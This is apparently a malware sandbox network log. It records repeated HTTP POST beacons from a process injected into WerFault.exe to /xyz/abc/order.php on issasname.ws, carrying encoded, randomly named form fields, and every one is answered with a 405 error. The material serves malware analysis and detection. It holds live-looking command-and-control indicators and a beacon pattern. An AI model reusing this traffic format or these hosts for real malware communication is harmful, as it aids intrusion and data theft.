                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:04.219546080 CET116OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1050
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:04.219605923 CET118OUTData Raw: 7a 65 6a 6f 74 79 64 69 6e 3d 33 44 43 45 39 37 41 30 39 43 44 38 42 35 45 34 44 32 44 37 39 46 43 32 31 41 44 42 46 45 35 34 43 30 34 36 43 35 44 32 33 30 31 36 30 43 44 32 46 45 26 78 61 64 67 6a 6d 70 3d 33 38 36 31 35 36 31 33 26 62 69 70 77
                      Data Ascii: zejotydin=3DCE97A09CD8B5E4D2D79FC21ADBFE54C046C5D230160CD2FE&xadgjmp=38615613&bipwd=eb25a9741db4ab24db898ffddb108f4d05c17c1bc180461ba9fa0e6522d2e271befbbb05795ca41d422eb562948e179e8153e852a46f9911be012b10132436c6b7f213e6bf5a665b120854fd0340803
                      Dec 5, 2022 12:47:04.544121981 CET118INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:04 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.54969564.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:09.385588884 CET119OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1022
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:09.385744095 CET120OUTData Raw: 71 6d 69 65 3d 33 32 32 33 30 35 36 36 26 73 71 6f 6d 65 63 3d 33 36 42 34 44 46 38 37 37 31 46 45 46 46 33 46 45 45 38 38 41 30 31 37 34 32 35 41 38 31 46 43 39 33 43 34 31 39 46 44 26 75 75 75 75 6f 6f 6f 6f 3d 38 45 41 36 46 46 36 45 46 31 38
                      Data Ascii: qmie=32230566&sqomec=36B4DF8771FEFF3FEE88A017425A81FC93C419FD&uuuuoooo=8EA6FF6EF18DF106912CDC2D676BA722FE815937D5DA648470870403FAAE297BBAEE8216DF7FA9BB7C84B03C355743076438EE42BF36FD8DB56492CE9595641AD9560C950A92C913FA1431A1EB59A17CEE9F9925135F
                      Dec 5, 2022 12:47:09.799597025 CET121INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:09 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:11.178157091 CET121OUTPOST /xyz/abc/order.php?id=4981026 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1086
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:11.178157091 CET122OUTData Raw: 6e 67 7a 73 6c 65 78 71 6a 3d 39 32 32 36 37 37 35 39 26 70 6b 66 61 76 3d 35 37 64 36 37 34 31 32 38 64 37 36 39 38 61 35 39 61 66 64 39 30 37 36 35 66 37 65 30 38 34 64 31 33 36 63 38 32 61 65 66 37 32 65 34 64 38 39 35 66 62 30 30 36 35 30 34
                      Data Ascii: ngzslexqj=92267759&pkfav=57d674128d7698a59afd90765f7e084d136c82aef72e4d895fb006504dc22de2ff4790521070&rolifcz=1e7bd3652b04265c6f056057070faed16b5dd87fe37f46e7f1aa472a2e139f6daa69940fd66ec02f67bb28d24fbee36ee48909c134bca9ebedec799ef34378d7a11a8
                      Dec 5, 2022 12:47:11.349355936 CET123INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:11 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:12.620984077 CET123OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1025
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:12.621218920 CET124OUTData Raw: 64 67 6a 73 76 79 68 3d 42 43 32 42 42 39 43 42 45 36 35 46 43 44 43 45 42 35 30 33 43 45 37 34 45 33 45 36 33 43 45 46 31 46 31 33 26 62 63 64 6b 6c 3d 36 38 34 37 37 39 35 26 66 6b 70 61 66 6b 76 61 66 3d 64 34 36 64 31 33 30 31 39 37 34 63 38
                      Data Ascii: dgjsvyh=BC2BB9CBE65FCDCEB503CE74E3E63CEF1F13&bcdkl=6847795&fkpafkvaf=d46d1301974c8792230fc49c624247c23a464b3887b4e9512dfe149e31f0b44139361242d07a3edd4dd329db8476d83676a0ed4df52a81f450e383251593cadd92b948a78a284dce70c472d6d918dc60bc6b68b5628ff6
                      Dec 5, 2022 12:47:12.792326927 CET125INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:12 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.54969664.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:16.077326059 CET126OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1068
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:16.077361107 CET127OUTData Raw: 6e 61 6e 61 74 67 74 67 74 3d 37 32 65 66 33 63 62 63 37 39 65 64 30 34 35 37 32 32 62 37 61 33 66 31 30 64 33 36 66 61 36 38 64 64 31 63 32 65 63 66 33 36 34 64 38 36 37 61 37 31 32 62 33 30 63 64 36 62 62 61 39 37 36 33 37 64 33 30 26 6c 77 68
                      Data Ascii: nanatgtgt=72ef3cbc79ed045722b7a3f10d36fa68dd1c2ecf364d867a712b30cd6bba97637d30&lwhsjuf=78145233&petid=96b9753ee4c608b817f6e8570a6da00f4e6e8dc13ffd566510e5ed1b8db26514cd7e898850db097d4ce8528a9ef8898654893cd92ac552983dfd4977e0d464d189c36e31a130c
                      Dec 5, 2022 12:47:16.248684883 CET127INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:16 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:17.283337116 CET128OUTPOST /xyz/abc/order.php?page=69 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1048
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:17.283370972 CET129OUTData Raw: 6b 75 65 6f 3d 39 32 64 64 65 31 61 39 37 31 31 32 35 64 31 62 65 61 36 65 37 35 65 37 30 64 34 61 31 38 65 30 64 37 65 30 33 38 65 35 35 33 36 32 65 33 26 69 71 79 67 6f 77 65 6d 3d 37 36 39 31 34 37 33 36 26 6d 79 6b 77 69 75 3d 34 36 46 34 41
                      Data Ascii: kueo=92dde1a971125d1bea6e75e70d4a18e0d7e038e55362e3&iqygowem=76914736&mykwiu=46F4A717002D59271D29E4C928478FF8ED7445089A1C3034C106E89F79C004500AD4F20ECBC0CC41E13C47B9F9945399158168B9112DB3F6C4AC7437F49D1ACE49205B2519CB5C6115089DB103A04C653678CE
                      Dec 5, 2022 12:47:17.454430103 CET129INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:17 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:18.507456064 CET130OUTPOST /xyz/abc/order.php?page=127 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1054
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:18.507813931 CET131OUTData Raw: 7a 65 64 69 6e 6d 72 3d 38 31 32 38 30 33 61 31 32 62 66 62 33 66 32 39 39 62 66 38 65 32 37 37 66 63 37 37 32 34 66 39 37 34 36 39 31 37 62 65 37 38 38 62 36 33 61 39 39 34 38 64 38 62 35 61 63 38 66 66 37 65 30 30 26 78 61 78 61 64 3d 32 38 38
                      Data Ascii: zedinmr=812803a12bfb3f299bf8e277fc7724f9746917be788b63a9948d8b5ac8ff7e00&xaxad=28809715&bijqxyfgn=193fcfad128d1019812eba84ed396accd779a598b1ff4c7c84640d620113f1b11b1056c5739ef51b641991ad4b32c7f427d239c094c7f0f4efa69ddcd1d8224e13036c93c4ecac165
                      Dec 5, 2022 12:47:18.678555965 CET131INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:18 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.54969764.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:21.944791079 CET133OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1042
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:21.945249081 CET134OUTData Raw: 61 61 61 67 3d 32 32 34 30 45 43 34 44 45 35 43 43 38 41 33 34 38 42 37 38 44 43 45 30 46 42 43 33 42 36 44 39 46 39 32 39 32 42 32 31 26 79 77 75 79 77 75 79 77 3d 37 37 33 33 35 39 34 38 26 63 65 67 6f 71 73 3d 41 37 38 41 35 32 43 41 33 31 44
                      Data Ascii: aaag=2240EC4DE5CC8A348B78DCE0FBC3B6D9F9292B21&ywuywuyw=77335948&cegoqs=A78A52CA31DBEB6242438D8C64501D92AF888388E6BF163B83A6A133F7C9682ADF01A27389514CEA6CAD6463430F67D19B957178F7995BA25E6208C16996A9D8B09124A9A153085A6F284C03D56A45C822DDE3B1448E
                      Dec 5, 2022 12:47:22.117517948 CET134INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:22 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:23.158463001 CET135OUTPOST /xyz/abc/order.php?page=33 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1008
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:23.158523083 CET136OUTData Raw: 65 6f 73 63 6d 71 61 65 3d 33 38 35 32 36 41 32 42 46 36 45 37 30 45 46 30 26 63 6b 6d 75 63 65 3d 33 32 31 30 39 36 36 38 26 67 73 79 6b 3d 34 34 66 32 35 63 66 36 31 38 61 66 35 30 37 37 33 35 39 63 61 62 36 37 37 66 30 36 64 30 33 64 34 33 62
                      Data Ascii: eoscmqae=38526A2BF6E70EF0&ckmuce=32109668&gsyk=44f25cf618af5077359cab677f06d03d43b2a088add3797d15f346242bdedaac51d6815be1d7bbb2de19094fb979f9c79d2bd14f4cb768f48c9ff58769559cb09a9fa6b62a2e1605e8d09eeb5bef5cfd5caac1a37d768fdc117cf93962f1a496a964
                      Dec 5, 2022 12:47:23.331394911 CET136INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:23 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:24.377403021 CET137OUTPOST /xyz/abc/order.php?pid=631 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1054
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:24.377502918 CET138OUTData Raw: 78 61 64 61 64 3d 34 32 32 33 38 31 38 33 26 7a 65 6a 69 6e 73 72 3d 61 38 37 61 38 61 65 62 63 66 31 32 35 38 32 63 35 64 36 64 62 34 30 38 37 34 66 32 64 34 30 35 30 32 32 66 39 66 64 66 33 66 37 34 39 33 35 37 65 63 38 31 30 61 33 35 30 32 66
                      Data Ascii: xadad=42238183&zejinsr=a87a8aebcf12582c5d6db40874f2d405022f9fdf3f749357ec810a3502fa4bca&bipqxefmt=F9F28A0AED8676D72BC15E14B4F5A4639291E3ADDFD8C1C4D065223BE2179BF7DBD3C6A22EE52944CA943B7A7A1AB67354293636D7B1B851F55B58D2DC4E23D6CD51F8F6C32D7EE15
                      Dec 5, 2022 12:47:24.599602938 CET138INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:24 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.54969864.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:27.881628036 CET139OUTPOST /xyz/abc/order.php?id=4923518 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1010
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:27.881628036 CET140OUTData Raw: 73 6b 69 61 79 71 69 67 3d 38 30 63 36 37 62 39 34 33 65 65 62 31 62 37 65 37 37 26 71 67 63 73 6f 65 3d 37 31 30 30 36 34 30 38 26 75 6f 6f 69 3d 35 64 39 39 33 66 31 32 64 34 30 64 64 36 36 32 63 38 39 61 65 39 34 64 39 31 65 35 35 36 31 63 62
                      Data Ascii: skiayqig=80c67b943eeb1b7e77&qgcsoe=71006408&uooi=5d993f12d40dd662c89ae94d91e5561cb1d87b1b3034839aa60f7f08b7d77038d64cceaf2a593ad74f503997ab5423918d793795095ad03dd2f199e3dbc56e982c8007e9e6f1a4c8cf023b49877cf016001bd00d8b016123ff01b893991512be99
                      Dec 5, 2022 12:47:28.052932024 CET141INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:27 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:29.304999113 CET141OUTPOST /xyz/abc/order.php?pid=668 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:29.304999113 CET142OUTData Raw: 6c 77 68 73 64 6f 7a 3d 45 33 44 30 37 39 45 46 31 30 35 32 43 39 33 39 31 34 42 32 42 44 36 36 45 36 33 38 33 37 32 38 31 33 26 6a 73 62 6b 74 3d 31 33 32 38 34 36 38 35 26 6e 61 6e 61 6e 61 6e 61 74 3d 61 37 30 35 64 33 64 32 65 64 66 35 61 37
                      Data Ascii: lwhsdoz=E3D079EF1052C93914B2BD66E638372813&jsbkt=13284685&nanananat=a705d3d2edf5a71a8a4be7ed0a38a89bc0cb7ab1d5615e2f421a6058c90f47ed8c123427f1f7d16142d4756a9a6e173eac89fc9d77a2d3648a052950123c590fd77ac3fab65aa1803d732c844dc235a1df9d738a92e28e8
                      Dec 5, 2022 12:47:29.759772062 CET143INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:29 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:30.918195963 CET143OUTPOST /xyz/abc/order.php?id=8413675 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1050
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:30.918195963 CET144OUTData Raw: 6a 79 6e 63 72 67 70 3d 35 39 44 39 41 44 44 43 30 36 31 37 42 30 46 38 41 44 41 34 34 37 30 33 46 33 42 43 33 44 36 46 31 35 38 38 33 43 32 33 33 44 43 31 30 33 41 36 31 38 41 42 34 36 30 39 37 31 36 31 26 68 75 68 75 68 3d 32 35 36 39 37 30 37
                      Data Ascii: jyncrgp=59D9ADDC0617B0F8ADA44703F3BC3D6F15883C233DC103A618AB46097161&huhuh=25697077&lctkbsdul=472df24452d64360e499ab823368ff8b18975d7402c5eb47e93cc8acb2ae4f1747976dbfd49217ca6e85a455b9ec7d45c9a5c83a1a7394d64c694e82c066ece469bba3c83b05824297a6e
